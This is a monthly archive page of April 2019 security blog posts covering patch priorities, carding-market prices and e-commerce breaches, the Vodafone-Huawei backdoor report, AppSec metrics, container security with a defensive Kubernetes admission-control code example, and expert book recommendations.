Monthly Archives: April 2019

Tripwire Patch Priority Index for April 2019

Tripwire’s April 2019 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft, Adobe, and Oracle. First on the patch priority list this month are patches for Microsoft’s Browser and Scripting Engine. These patches resolve 13 vulnerabilities, including fixes for Memory Corruption, Browser Tampering, and Information Disclosure vulnerabilities. Next on the list are patches for […]

The post Tripwire Patch Priority Index for April 2019 appeared first on The State of Security.

Data: E-Retail Hacks More Lucrative Than Ever

For many years and until quite recently, credit card data stolen from online merchants has been worth far less in the cybercrime underground than cards pilfered from hacked brick-and-mortar stores. But new data suggests that over the past year, the economics of supply-and-demand have helped to double the average price fetched by card-not-present data, meaning cybercrooks now have far more incentive than ever to target e-commerce stores.

Traditionally, the average price for card data nabbed from online retailers — referred to in the underground as “CVVs” — has ranged somewhere between $2 and $8 per account. CVVs are almost exclusively purchased by criminals looking to make unauthorized purchases at online stores, a form of thievery known as “card not present” fraud.

In contrast, the value of “dumps” — hacker slang for card data swiped from compromised retail stores, hotels and restaurants with the help of malware installed on point-of-sale systems — has long hovered around $15-$20 per card. Dumps allow street thieves to create physical clones of debit and credit cards, which are then used to perpetrate so-called “card present” fraud at brick and mortar stores.

But according to Gemini Advisory, a New York-based company that works with financial institutions to monitor dozens of underground markets trafficking in both types of data, over the past year the demand for CVVs has far outstripped supply, bringing prices for both CVVs and dumps roughly in line with each other.

Median price of card not present (CNP) vs. card-present (CP) over the past year. Image: Gemini

Stas Alforov, director of research and development at Gemini, says his company is currently monitoring most underground stores that peddle stolen card data — including such heavy hitters as Joker’s Stash, Trump’s Dumps, and BriansDump.

Contrary to popular belief, when these shops sell a CVV or dump, that record is then removed from the inventory of items for sale, allowing companies that track such activity to determine roughly how many new cards are put up for sale and how many have sold. Underground markets that do otherwise quickly earn a reputation among criminals for selling unreliable card data and are soon forced out of business.

“We can see in pretty much real-time what’s being sold and which marketplaces are the most active or have the highest number of records and where the bad guys shop the most,” Alforov said. “The biggest trend we’ve seen recently is there appears to be a much greater demand than there is supply of card not present data being uploaded to these markets.”

Alforov said dumps are still way ahead in terms of the overall number of compromised records for sale. For example, over the past year Gemini has seen some 66 million new dumps show up on underground markets, and roughly half as many CVVs.

“The demand for card not present data remains strong while the supply is not as great as the bad guys need it to be, which means prices have been steadily going up,” Alforov said. “A lot of the bad guys who used to do card present fraud are now shifting to card-not-present fraud.”

One likely reason for that shift is that the United States is the last of the G20 nations to make the transition to more secure chip-based payment cards, which is slowly making it more difficult and expensive for thieves to turn dumps into cold hard cash. This same increase in card-not-present fraud has occurred in virtually every other country that long ago made the chip card transition, including Australia, Canada, France and the United Kingdom.

The increasing value of CVV data may help explain why we’ve seen such a huge uptick over the past year in e-commerce sites getting hacked. In a typical online retailer intrusion, the attackers will use vulnerabilities in content management systems, shopping cart software, or third-party hosted scripts to upload malicious code that snarfs customer payment details directly from the site before it can be encrypted and sent to card processors.

Research released last year by Thales eSecurity found that 50 percent of all medium and large online retailers it surveyed acknowledged they’d been hacked. That figure was more than two and a half times higher than a year earlier.

BIG BANG VS. LOW-AND-SLOW

Much of the media’s attention has been focused on recent hacks against larger online retailers, such as those at the Web sites of British Airways, Ticketmaster, and electronics giant NewEgg. But these incidents tend to overshadow a great number of “low-and-slow” compromises at much smaller online retailers — which often take far longer to realize they’ve been hacked.

For example, in March 2019 an analysis of Gemini’s data strongly suggested that criminals had compromised Ticketstorm.com, an Oklahoma-based business that sells tickets to a range of sporting events and concerts. Going back many months through its data, Gemini determined that the site had likely been hacked for more than two years — allowing intruders to extract around 4,000 CVVs from the site’s customers each month, and approximately 35,000 accounts in total since February 2017.

Ticketstorm.com did not respond to requests for comment, but an individual at the company who answered a call from KrebsOnSecurity confirmed Ticketstorm had recently heard from Gemini and from card fraud investigators with the U.S. Secret Service.

“It’s not just large sites getting popped, it’s mostly small to mid-sized organizations that are being compromised for long periods of time,” Alforov said. “Ticketstorm is just one of ten or twenty different breaches we’ve seen where the fraudsters sell what they collected and then come back and collect more over several years.”

In some ways, CVVs are more versatile for fraudsters than dumps. That’s because about 90 percent of dumps for sale in the underground do not come with the other consumer data points needed to complete various online transactions — such as the cardholder’s name or billing address, Gemini found.

This is particularly true when CVV data is collected or amended by phishing sites, which often ask unwitting consumers to give up other personal information that can aid in identity theft and new account fraud — including Social Security number, date of birth and mother’s maiden name.

All of which means e-commerce retailers need to be stepping up their game when it comes to staving off card thieves. This in-depth report from Trustwave contains a number of useful suggestions that sites can consider for a defense-in-depth approach to combating an increasingly crowded field of criminal groups turning more of their attention toward stealing CVV data.

“There is a lot more incentive now than ever before for thieves to compromise e-commerce sites,” Alforov said.

Updates for Microsoft 365 help strengthen data privacy

As data continues to grow exponentially and travel across organizational boundaries, privacy and compliance professionals play an increasingly strategic role within organizations. Several updates—announced today—for Microsoft 365 provide organizations with more control and options to strengthen their data privacy practices, including:

  • New capabilities for Microsoft 365 E5 and E5 Compliance, such as the new Office 365 Advanced Message Encryption feature, data investigation capabilities, Microsoft Teams compliance features, and a new Advanced eDiscovery experience.
  • The ability to use Compliance Manager to get automated updates of security controls and create your own assessments—including on-premises and non-Microsoft applications—against any regulation or standard, so you can manage compliance across data assets in a unified way.

To learn more about these updates, read Grow and protect your business with more privacy controls from Microsoft 365.

The post Updates for Microsoft 365 help strengthen data privacy appeared first on Microsoft Security.

Test Your Knowledge on Cloud Adoption and Risks

Our data lives in the cloud, and nearly a quarter of it requires protection to limit our risk. You won’t be able to get far in your transformation to the cloud without learning the sources of cloud data risk and how to circumnavigate them.

In our latest Cloud Adoption and Risk Report, we analyze the types of sensitive data in the cloud and how it’s shared, examine IaaS security and adoption trends, and review common threats in the cloud. Test your knowledge on the latest cloud trends and see if your enterprise understands the basics of cloud-related risks.

Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Cloud Adoption and Risk Report 2019

Blog: Cloud Security Risks – It’s not black and white

MVISION Cloud Data Sheet

MVISION Cloud


The post Test Your Knowledge on Cloud Adoption and Risks appeared first on McAfee Blogs.

Behind the Screens: An Interview with Trystan Orr

Cybersecurity is best approached holistically—by combining human, physical, and technical efforts together to mitigate threats. But how exactly does the human element play a role? To grasp just how humans and psychology are central to the cybersecurity industry, we spoke to our very own Security Operations Center Analyst, Trystan Orr.

Q:  How did you first become interested in cybersecurity?

A:  I’ve been interested in technology since I was very young—I was introduced to computers and video games early.  But there was no particular turning point that got me into cybersecurity; it was more of a slow realization.  I took a couple of coding courses in high school and really liked them.  Then, in college, I took a security class and received my Security+ certification.  I really enjoyed just how pervasive security is: in anything you do, you have to consider security.

“At the same time, I started to notice a strong correlation between psychology and security. It’s about the way humans interact with the technology, and that’s why cybersecurity hit a note with me. Humans can be your greatest risk, and your greatest strength.”

Q:  How do you apply your understanding of psychology to your job as a security analyst?

A:  One of the key parts of my job as an analyst is thinking of the business need that accompanies security initiatives.  For example, when a security alert is triggered, you have to think about the people behind the screens that triggered the alert.  This is where psychology comes in.  Once you have an understanding of who they are and what they’re doing in their day-to-day, you can respond to the alert.  You don’t want to suggest something that slows down the business, or stops the user from doing what they need to do.

Understanding the user, the human, allows us to offer these custom solutions.

Q:  Looking ahead a few years, what do you predict will be the next big change in the industry?

A:  Awareness.  I think people are becoming more aware of security, which is exciting to see.  For instance, users are becoming more aware of phishing and the importance of reporting potential phishing emails.

“I think part of this increased awareness is a shift from thinking of cybersecurity as a purely technological problem, to a human problem as well.  Users are starting to see the role they play in cybersecurity.” 

Q:  What do you see as the value of encouraging women to enter the industry?

A:  I think including more women in the industry brings different viewpoints that are valuable in discussion and problem-solving. It’s becoming much more apparent that you have to have different people and different personalities to be effective. If you have a different viewpoint, you also have different experiences backing up that viewpoint.

This is especially important in security; you have to be able to have open discussions about how certain security measures affect the user’s risk and productivity.  The goal is to understand what’s best for the user in order to offer the best solution.  This is best achieved when a variety of different viewpoints are brought to the table.

Q:  What advice do you have for anyone interested in entering the cybersecurity industry?

A:  When I first started in the industry as an intern, I didn’t have a security background.  I understood what was going on, but there was a lot I didn’t know. I realized that you must be completely unafraid to ask questions—before you start a new job or internship, and then throughout the entire time you’re there.

There’s a lot you can learn on your own too.  If you are even a little interested, you don’t have to pay loads of money to learn more about the industry.  Always be motivated and open to new ways you can learn.

To hear from more inspiring women in cybersecurity, check out our series.

The post Behind the Screens: An Interview with Trystan Orr appeared first on GRA Quantum.

Learning From the Vodafone-Huawei Backdoor Scandal


Yesterday, Bloomberg reported that Vodafone uncovered hidden backdoors in Huawei equipment used for the carrier’s Italian business, which could have given Huawei unauthorized access to Italian homes and businesses. The alleged backdoors were found in 2011 and 2012, and Vodafone told Bloomberg that the issues were resolved at the time.

However, the BBC published a piece this morning in which Vodafone denied the Bloomberg report, citing a spokesperson who says that, "The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”

Further, the spokesperson indicated that Bloomberg was incorrect in saying that Huawei could have had unauthorized access to the carrier’s Italian network, nor does Vodafone have evidence of any unauthorized access.

According to the BBC, Vodafone has paused the deployment of Huawei equipment in its core networks until a few issues are resolved – chief among them the accusation that Huawei is controlled by the Chinese government, which could pose a security risk. The US encouraged allies not to use the equipment in 5G networks, with Secretary of State Mike Pompeo saying the U.S. wouldn't be able to work with nations using the Chinese technology.

What’s the Deal with Backdoors?

Backdoors are a method of bypassing authentication or other security controls in order to access a computer system or the data contained on that system. They can exist at the system level, in a cryptographic algorithm, or within an application. Some backdoors are included in software intentionally; however, they can still pose a serious threat if uncovered by the wrong people.

According to a paper from Veracode CTO Chris Wysopal and Veracode Chief Research Officer Chris Eng, backdoored software enables attackers to gain access to highly secure systems that are otherwise rigorously locked down and monitored. The network traffic to and from an application backdoor will most often look like typical usage of the networked application.

For instance, the network traffic of an attacker using backdoored blog software will look like the typical web traffic of a blog user. This will enable them to bypass any network IDS protection. Since the backdoored software is installed by the system operator and is legitimate software it will typically bypass anti-virus software protection.

Many attackers will place backdoors in the source code of software that they have legitimate access to simply because it is a challenge and because they can. They have no intention initially of compromising systems where the software will be installed but take the opportunity because they may want to use the backdoor in the future.

Companies like Apple have forsaken backdoors, and have gone as far as to build their hardware without third-party access to ensure an acceptable level of protection for users and their personal information.

Curious to find out if you have backdoors in your code? Get in touch so we can help.

Your AppSec Program Can Make Your Developers and Your CFO Happy


While cybersecurity risk is steadily growing, so too is the recognition that application security (AppSec) is critical to protecting valuable enterprise resources. More than ever, ensuring that you have a program that spans the entire SDLC is critical to preventing breaches of your organization’s and your customers’ data. Just as it is important to inventory and secure all of the applications in your portfolio, it’s equally important that your applications are coded securely. Let’s be real: there are a few ways that shifting your application security program left can go wrong. These include purchasing solutions that don’t really fit the needs of your organization, failing to determine which flaws need fixing first in order to avoid a breach, and measuring success against the wrong metrics. This can cost you valuable resources, including your developers’ time and energy and your clients’ trust – and incite the ire of your organization’s CFO.

Here are three tips for running a developer-friendly AppSec program that saves your organization’s most precious resources.

Create Strong Application Security Policies

You know how you treat each email you receive with varying levels of attention and detail? The same sort of policies should be implemented when it comes to fixing flaws found in your software. Like any tool or methodology, AppSec requires a strong structural framework to deliver maximum results. A broadly defined and unfocused program, and the absence of strong AppSec policies, can lead to teams chasing down every flaw and fix. Essentially, you’re running the risk of overwhelming your developers who will no longer have the time or energy to take threats seriously.

There is no one-size-fits-all framework when it comes to creating application security policy (here’s a guide to get you started). It’s really a matter of setting the bar at the right risk and protection level, determining which flaws really matter, understanding remediation and mitigation, and keeping an eye on third-party applications and open source components. Focusing on AppSec standards, like OWASP Top 10, and balancing the needs of your organization will position you for maximum performance and protection, and help you avoid developer burnout.

Identify Appropriate Metrics

The right set of metrics and key performance indicators (KPIs) can greatly simplify and streamline both your software development and your application security. There are a few other metrics to consider beyond meeting your organization’s policy requirements. For example, organizations that have adopted Agile and DevSecOps will find themselves scanning applications and code more frequently. This kind of scanning, when done through automated integration with development systems and at the times best aligned for the development team, can limit the number of vulnerabilities introduced in the Testing and Production stages. Ensuring scan frequency also means reduced mean time to remediate (MTTR) – Veracode’s State of Software Security Volume 9 found that development teams who scanned 300 or more times per year are fixing flaws 11.5x faster than other organizations.

Another metric to consider is flaw density. Flaw density provides a way of looking at the number of flaws produced from a static analysis over the size of the application and can provide directional guidance when comparing groups of applications. A high flaw density simply means more flaws to address, allowing the opportunity to determine where best to use AppSec resources and prioritize flaws accordingly. The beauty of implementing a developer-friendly AppSec program is that it decreases flaw density over time. The Total Economic Impact™ of the Veracode Application Security Platform, a Forrester Consulting study, shows that prior to using Veracode, the composite organization experienced 60 flaws per MB of code. After adopting the Veracode platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50% to 90% over three years.

Ensuring that your team has access to actionable results from all application security testing scans performed in a single platform makes coordinating remediation between security, development, and other IT teams easier and more efficient. It also simplifies your ability to measure against the metrics and KPIs set for your organization. To learn more about how to measure your AppSec program, check out the Everything You Need to Know About Measuring Your AppSec Program guide.

Select the Right Solutions

When it comes to AppSec, you need a combination of solutions to ensure that you’re securing your applications at every stage – that’s right, there’s still no silver bullet in security. In the Forrester Consulting study, the organizations interviewed used the Veracode Platform to build stringent security controls and integrate application security testing into their CI/CD pipeline. In addition to using Veracode Static Analysis and Veracode Dynamic Analysis, these organizations shifted security left using Veracode Greenlight and Veracode Software Composition Analysis to identify issues at inception in the SDLC.

As a result, they found that developers were introducing fewer flaws to their code and that the flaws they did find took less time to resolve because we are able to offer contextual remediation advice for those security flaws. Since security flaws were caught earlier in the SDLC, the organization saw a 90 percent reduction in time required to resolve these flaws. Resolutions which previously took 2.5 hours on average were reduced to 15 minutes.

With MTTR included in your overall metrics, it’s important that your application security solutions are designed for speed AND a low false positive rate. This means that security and development teams will spend less time sorting through results to find actual vulnerabilities, and spend more time fixing what matters so that they can move on to other projects.

Developing an AppSec Road Map Saves Time and Money

Organizations need to conduct security testing at the speed of modern day software development in order to maintain tight product roadmap deadlines and increase speed to market. When your teams take the time to understand the bigger picture, the solutions that they need to get the job done well and done efficiently, and they’re able to save time and money doing it, everybody wins. Your development teams will have the space to make your next standout product or feature. You will have the resources to invest in furthering their development education. Your applications will be more secure and your entire organization will be the better for it.

The Next Enterprise Challenge: How Best to Secure Containers and Monolithic Apps Together, Company-wide

Submitted by: Adam Boyle, Head of Product Management, Hybrid Cloud Security, Trend Micro

When it comes to software container security, it’s important for enterprises to look at the big picture, taking into account how they see containers affecting their larger security requirements and future DevOps needs. Good practices can help security teams build a strategy that allows them to mitigate pipeline and runtime data breaches and threats without impacting the agility and speed of application DevOps teams.

Security and IT professionals need to address security gaps across agile and fast-paced DevOps teams but are challenged by decentralized organizational structures and processes. And since workloads and environments are constantly changing, there’s no silver bullet when it comes to cybersecurity; there’s only the information we have right now. To help address the current security landscape, and where containers fit in, we need to ask ourselves a few key questions.

How have environments for workloads changed and what are development teams focused on today? (i.e. VMs to cloud to serverless > DevOps, microservices, measured on delivery and uptime).

Many years ago, the customer conversations that we were having were primarily around cloud migration of traditional, legacy workloads from the data center to the cloud. While performing this “forklift,” they had to figure out what IT tools, including security, would operate naturally in the cloud. Many traditional tools they had already purchased previously, before the cloud migration, didn’t quite work out when expanded to the cloud, as they weren’t designed with the cloud in mind.

In the last few years, those same customers who migrated workloads to the cloud started new projects and applications using cloud native services, building these new capabilities on Docker and on serverless technologies such as AWS Lambda, Azure Functions, and Google Cloud Functions. These technologies have enabled teams to adopt DevOps practices where they can continuously deliver “parts” of applications independently of one another, ultimately delivering outcomes to market much faster than one would with a monolithic application. The new projects have given birth to CI/CD pipelines leveraging Git for source code management (using hosted versions from either GitHub or BitBucket), Jenkins or Bamboo for DevOps automation, and Kubernetes for automated deployment, scaling, and management of containers.

Both of these thrusts are now happening in parallel, driving two distinct classes of applications—legacy, monolithic applications, and cloud native microservices. The questions for an enterprise are simple: how do I protect all of this? And how can I do this at scale?

What’s worth mentioning is also the maturity of IT and how these teams have evolved into leveraging “infrastructure as code.” That is, writing code to automate IT operations. This includes security as code or writing code to automate security. Cloud operations teams have embraced automation and have partnered with application teams to help scale the automation of DevOps driven applications while meeting IT requirements. Technologies like Chef, Puppet, Ansible, Terraform, and Saltstack are popular in our customer base when automating IT operations.

While vulnerabilities and threats will always persist, what is the bigger impact on the organization when it comes to DevOps teams and security?

What we hear when companies talk to us is that the enterprise is not designed to do security at scale for a large set of DevOps teams who are continuously doing build->ship->run and need continuous and uninterrupted protection.

A typical enterprise has centralized IT and Security Ops teams that serve many groups of internal customers, typically the business units responsible for generating the revenue of the enterprise.

So, how do tens or hundreds of DevOps teams who continuously build->ship->run, interact with centralized IT and security Ops teams, at scale? How do IT and security Ops teams embrace these practices and technologies, and ensure that they are secure—both the CI/CD pipelines and the runtime environments?

These relationships between IT teams (including security teams) and the business units have largely been at an executive level (VP and up), but to deliver “secure” outcomes continuously, a more effective and more automated interplay between these teams is needed.

We see many DevOps teams across business units incorporating security with varying degrees of rigor—or buying their own security solutions that only work for their set of projects—purchased out of their business unit budgets, implemented with limited security experience and no tie-back to corporate security requirements or IT awareness. This leads to a fragmented, duplicated, complicated, inconsistent security posture across the enterprise and higher cost models on security tools that become more complicated to manage and support. The pressure to deliver faster within a business unit sometimes comes at the cost of a coordinated enterprise-wide security plan; we’ve all been there, and there’s often a balance that needs to be found.

The relationship, at the working level, between business unit application teams and centralized IT and security Ops teams is not always a collaborative, healthy working relationship. Sometimes it has friction. Sometimes the root cause of this friction is that application teams have a significantly higher understanding of DevOps practices and tools, and of technologies such as Docker, Kubernetes, and various serverless technologies, than their IT counterparts. We’ve seen painful, unproductive discussions in which application teams try to educate their IT/Security teams on the basics, let alone get them on board with doing things differently. The friction increases if the IT and security Ops teams don’t embrace the changes in approach that container and serverless security require. So, to us, the biggest impact right now is this: if a DevOps team wants to deliver continuously while following an enterprise-wide approach, it needs a continuous relationship with the IT and security operations teams, who must become well educated in DevOps practices and tools and in microservices technologies (Docker, Kubernetes, etc.), so that the teams can work together to automate security across pipelines and runtime environments. And the IT and security teams need to level up their skill sets to DevOps and all associated technologies, and help teams move faster, not slower, while meeting security requirements.

To be true DevOps, the “Dev” part would be the application team, the “Ops” part would be ideally IT/security and they would work together. So, we think there could be some pretty big shifts on how enterprises organize their development teams and IT/security Ops teams as the traditional organizational models favor delivery of monolithic, legacy applications that do not do continuous delivery.

The biggest opportunity for IT/security Ops teams is to engage the application teams with a set of self-service tools and practices that help the teams move faster while meeting the IT and security requirements of the enterprise.

How can DevOps teams take advantage of the best security measures to better protect emerging technologies like container environments and their supporting tools?

Well, this could easily be a book! However, let’s try to summarize at a high level and break this down into “build,” “ship,” and “run.” By no means is this a complete list, but it is enough to get started. For more information, contact us.

Security teams have a fantastic opportunity to introduce the following services across the enterprise, for all teams with pipelines and runtimes, in a consistent way.

Build

  • Identification of all source code repositories and CI/CD pipelines across the enterprise, and their owners.
  • Static code analysis.
  • Image scanning for malware.
  • Image scanning for vulnerabilities.
  • Image scanning for configuration assessments (ensure images are hardened).
  • Indicator of Compromise (IoC) queries across all registries.
  • Secrets detection.
  • Automated security testing in staged environments, with generic and custom test suites.
  • Image Assertion – declaring an image to be suitable for the next stage of the lifecycle based on the results of scans, tests, etc.
  • Provide reporting to both application teams and security teams on security scorecards.

Ship

  • Admission control – the allowance or blocking of images to runtime environments based on security policies, image assertion, and/or signed images.
  • Vulnerability shielding of containers – Trend Micro will be releasing this capability later this year.

Run

  • Runtime protection of Docker and Kubernetes, including anomaly detection of abnormal changes or configurations.
  • Hardening of Kubernetes and Docker.
  • Using Kubernetes network policy capabilities for micro-segmentation, and not a third-party solution. Then, ensure Kubernetes is itself protected.
  • Container host-based protection—covering malware, vulnerabilities, application control, integrity monitoring, and log inspection—for full stack defense of the applications and the host itself.
  • Kubernetes pod-based protection (privileged container – one per pod). This can be shipped into Kubernetes environments just like any other container, and no host-based agent is required.

For serverless containers and serverless functions: application protection in every image or serverless function (an AppSec library covering RASP, OWASP, malware, and vulnerabilities inside the application execution path). Trend Micro will be releasing an offer later this year to address this.
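The “Ship” bullet above (admission control on image assertion and signed or digest-pinned images) and the hardening points under “Run” are where a pipeline's scan results actually get enforced. The following Python sketch is an added example, not code from the original post or from Trend Micro: it is the decision core of a Kubernetes validating admission webhook that receives an AdmissionReview for a Pod, requires every image to come from a trusted registry, be pinned by digest, and have a passing image assertion, and denies privileged containers and hostNetwork (which would bypass NetworkPolicy micro-segmentation). The registry name, digest, assertion store and pod specs are constructed for the example.

```python
"""Validating-admission policy for pods, in the spirit of the "Ship" controls above.

Added example, not code from the original post or from any vendor. Registry
name, digest, and pod specs are constructed for illustration.
"""
import json
import re

# Constructed policy data for this example.
TRUSTED_REGISTRIES = ("registry.example.internal/",)
GOOD_DIGEST = "sha256:" + "ab" * 32          # placeholder digest, not a real image
# "Image assertion": digests the build stage declared fit for the next stage.
ASSERTED_DIGESTS = {GOOD_DIGEST: "scan and test suite passed"}
DIGEST_RE = re.compile(r"^(?P<name>[^@\s]+)@(?P<digest>sha256:[0-9a-f]{64})$")


def check_image(image, trusted=TRUSTED_REGISTRIES, asserted=ASSERTED_DIGESTS):
    """Return policy violations for one image reference (empty list means OK)."""
    match = DIGEST_RE.match(image)
    if match is None:
        # A tag such as ":latest" is mutable: what was scanned may not be what runs.
        return [f"{image}: image must be pinned by sha256 digest, not by tag"]
    violations = []
    if not image.startswith(trusted):
        violations.append(f"{image}: registry is not in the trusted list")
    if match.group("digest") not in asserted:
        violations.append(f"{image}: no passing image assertion for this digest")
    return violations


def check_container(container):
    """Deny settings that undo the isolation the runtime protections rely on."""
    violations = []
    sc = container.get("securityContext", {})
    if sc.get("privileged", False):
        violations.append(f"{container['name']}: privileged containers are not allowed")
    if sc.get("allowPrivilegeEscalation", True):
        violations.append(f"{container['name']}: allowPrivilegeEscalation must be false")
    return violations


def evaluate_pod(pod):
    """Collect every violation for a Pod object; an empty list means admit."""
    spec = pod.get("spec", {})
    violations = []
    if spec.get("hostNetwork", False):
        # hostNetwork bypasses NetworkPolicy-based micro-segmentation.
        violations.append("pod: hostNetwork is not allowed")
    for container in spec.get("initContainers", []) + spec.get("containers", []):
        violations += check_image(container["image"])
        violations += check_container(container)
    return violations


def admission_response(review):
    """Build the AdmissionReview a validating webhook returns to the API server."""
    request = review["request"]
    violations = evaluate_pod(request["object"])
    response = {"uid": request["uid"], "allowed": not violations}
    if violations:
        response["status"] = {"code": 403, "message": "; ".join(violations)}
    return {"apiVersion": review["apiVersion"], "kind": "AdmissionReview",
            "response": response}


def make_review(pod, uid="0f1e2d3c"):
    """Wrap a Pod in the AdmissionReview envelope the API server would send."""
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "request": {"uid": uid, "kind": {"kind": "Pod"}, "object": pod}}


# Constructed pods: one that satisfies the policy, one that breaks several rules.
GOOD_POD = {"kind": "Pod", "metadata": {"name": "payments-api"}, "spec": {"containers": [
    {"name": "api",
     "image": "registry.example.internal/payments/api@" + GOOD_DIGEST,
     "securityContext": {"allowPrivilegeEscalation": False}}]}}
BAD_POD = {"kind": "Pod", "metadata": {"name": "debug"}, "spec": {"hostNetwork": True, "containers": [
    {"name": "shell", "image": "docker.io/library/ubuntu:latest",
     "securityContext": {"privileged": True}}]}}

if __name__ == "__main__":
    for pod in (GOOD_POD, BAD_POD):
        print(json.dumps(admission_response(make_review(pod))["response"], indent=2))
```

The design point is that the webhook never trusts a tag: only a digest can be matched against what the build stage scanned and asserted, so a re-pushed `:latest` cannot slip past a scan that ran on a different image. In a real deployment the assertion store would be populated by the pipeline and the webhook would also verify a signature on the image, which this sketch leaves out.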

Trend Micro provides a stronger, more robust full-lifecycle approach to container security. This approach helps application teams meet compliance and IT security requirements for continuous delivery in CI/CD pipelines and runtime environments. With multiple security capabilities, complete automation resources, and world class threat intelligence research teams, Trend Micro is a leader in meeting the cybersecurity needs of today’s application- and container-driven organizations.

Learn more at www.trendmicro.com/containers.

The post The Next Enterprise Challenge: How Best to Secure Containers and Monolithic Apps Together, Company-wide appeared first on .

The best cyber security books out there, chosen by over 20 experts

Books are the best way to go about learning in-depth knowledge, and this applies to cybersecurity as well. To this end, we’ve decided to approach these 21 experts about what the best educational cyber security books out there are.

Of course, we know there is no such thing, and each book is good in its own way. The endgame is to create a go-to resource of curated books you, as a user, can read to take your online security knowledge to the next level.

The experts we’ve included in this roundup are leading figures in the industry, and are frequently the first ones to learn about a new kind of malware or cyber threat.

To help you better navigate the list, we’ve added internal links so you can zip along from one expert’s recommendation to another.

Inbar Raz | Twitter | Principal researcher at PerimeterX

Inbar’s choice is “A Bug Hunter’s Diary”, by Tobias Klein. In a few words, Inbar summarizes the highlights of the book, and also a caveat:

I really liked it because the author did a great job at taking something that is technically sophisticated and hard, and socially admired [bug hunting, vulnerability exploitation], and making it accessible and understandable. I think that people who want to understand what vulnerability research is, without having to learn to do it themselves, will find it the perfect book for them. The caveat, though, is that you have to be able to read programming languages in order to fully understand the gravity of what he does.

A book for the technically minded user, who doesn’t mind delving into code to understand cyber threats.

Pierluigi Paganini | Twitter | Founder at Security Affairs

The book of choice for him is The Art of Deception by Kevin Mitnick.

It is a must read; the book explains the importance of social engineering in any attack.

The book shows that the human is the weakest link in the cyber security chain, and that the art of social engineering allows attackers to exploit it. The book includes real stories and social engineering cases and demonstrates how to chain them in real hacking scenarios.

Reading the book is also suggested for non-tech-savvy people; it can teach them how to avoid being a potential victim of attacks.

Alexandru Stoian | Cybersecurity researcher for the Romanian CERT

His list of recommended books is technical in nature and written for a technically-savvy person who wants to dive into the intricacies of cybersecurity.

Lawrence Abrams | Founder and chief editor of Bleeping Computer | Twitter

Practical Malware Analysis by Michael Sikorski and Andrew Honig is a frequently cited book in this roundup, and for good reason. It’s a go-to guide for many in learning both basic and advanced malware analysis and dissection techniques.

Understanding Cryptography by Christof Paar and Jan Pelzl is a book oriented towards more advanced readers who want to improve their education in the technical basics of cryptography.

Claus Houmann | Twitter | Community manager at Peerlyst

His recommendations aren’t one book, but instead a treasury of free cyber security books that cover the most important aspects of the niche. You can find books for just about any level, from cybersecurity beginner who wants to learn the ropes, to advanced users who want to improve their technical expertise.

Here’s the full list of free books, which includes titles such as The Car Hacker’s Handbook and Reverse Engineering for Beginners.

He also recommended three useful ebooks written in collaboration by members of Peerlyst’s community of information security experts. The first one is The Beginner’s Guide to Information Security, the second ebook is on the Essentials of Cybersecurity, while the third one talks about the Essentials of Enterprise Network Security.

Alexandre Campos | Profile page | Professor and IT Security team member

Here’s his answer when asked what the best educational cyber security books out there are:

There are lots of books I could mention here but since you ask me for only one, I can’t leave aside “Hacking Exposed 7“, by Stuart McClure, Joel Scambray and George Kurtz. These security experts show us, in a nice way, how to understand what hackers do during an attack and how to protect ourselves from their actions. They show us concepts and how they can be applied in practice, also telling us about several countermeasures against a wide variety of tools available for hackers to use. It is worth every page you read.

Thomas Callahan | Cybrary

Thomas hails from Cybrary, an online library of courses in various subfields of cybersecurity, such as penetration testing, or malware analysis.

In no particular order, this is his recommended list of cyber security books:

General knowledge and awareness:

Practical guides:

Adam Shostack, author of Threat Modeling | Blog Profile

“I’m going to say that Steven Bellovin’s “Thinking Security” is my favorite antidote to jumping to conclusions. Recently, I’ve seen lots of extreme responses to both the Intel management issue and the Windows Defender script engine. Both are bad, but jumping to “you will be working the weekend” doesn’t help. Bellovin’s book will.”

Dave Waterson | Personal Blog |CEO and founder of SentryBay

His recommended cybersecurity book is Countdown to Zero Day by Kim Zetter. It’s accessible to users without a technical background, and goes over the destructive power of Stuxnet, the malware responsible for sabotaging Iranian centrifuges used in their nuclear program.

Ilya Kolmanovich | Twitter | IBM

Ilya is a cybersecurity Threat Engineer and part of IBM’s Security Intelligence team.

His book of choice when it comes to cybersecurity education is Practical Malware Analysis by Michael Sikorski.

Joe Shenouda | LinkedIn | Principal Cyber Analyst at Verizon

The three books that he recommends are:

  1. Cyber War: The Next Threat to National Security and What to Do About It – Richard Clarke, Robert Knake
  2. Cyberspies: The Secret History of Surveillance, Hacking, and Digital Espionage – Gordon Corera
  3. Cybersecurity and Human Rights in the Age of Cyberveillance – edited by Joanna Kulesza & Roy Balleste

Martijn Grooten | Editor of Virus Bulletin | Twitter

“My favourite book on cybersecurity is Countdown To Zero Day, by Kim Zetter.

If it is specifically about educational cybersecurity books, my favourite would be Bulletproof SSL and TLS, by Ivan Ristic.”

Troy Hunt | Personal Blog |Creator of HaveIBeenPwned.com

We Are Anonymous by Parmy Olson offers an inside view into the workings of shadowy hacking groups such as LulzSec, Anonymous and the Global Cyber Insurgency.

Xavier Mertens | Personal Blog | Handler for the ISC Initiative

His go-to book is Practical Malware Analysis. It’s safe to say that this book has fairly widespread endorsement by now.

Raj Samani | Computer Security Expert and Chief Scientist at McAfee

The Cuckoo’s Egg by Cliff Stoll details the story of how the author managed to discover a computer espionage ring that had infiltrated the Lawrence Berkeley Lab. The investigation eventually led to the involvement of the CIA, and exposed the role of the KGB in the entire operation.

Liviu Arsene | Twitter | Senior E-Threat Analyst at Bitdefender

His recommended book is Ghost in the Wires, a biography of Kevin Mitnick, a malicious hacker who broke into numerous companies, such as Motorola and Sun Microsystems, all while ducking and dodging the FBI.

Pavel Pohorelsky | Twitter | CTO at Lamantine

Future Crimes by Marc Goodman is a New York Times best seller, which dives into the underground world of blackhat hackers, and explores their motivations, methods and purposes, as viewed by a man working in law enforcement on a mission to stop them.

John E. Dunn | Twitter | Editor and Co-founder at Techworld

Move Fast and Break Things by Jonathan Taplin is an exploration of how the Internet started to change according to the vision of the world’s greatest technology entrepreneurs, such as Mark Zuckerberg and Larry Page.

David Bisson | Twitter | Security Journalist and Associate Editor at Tripwire | Contributing Editor for Graham Cluley Security News

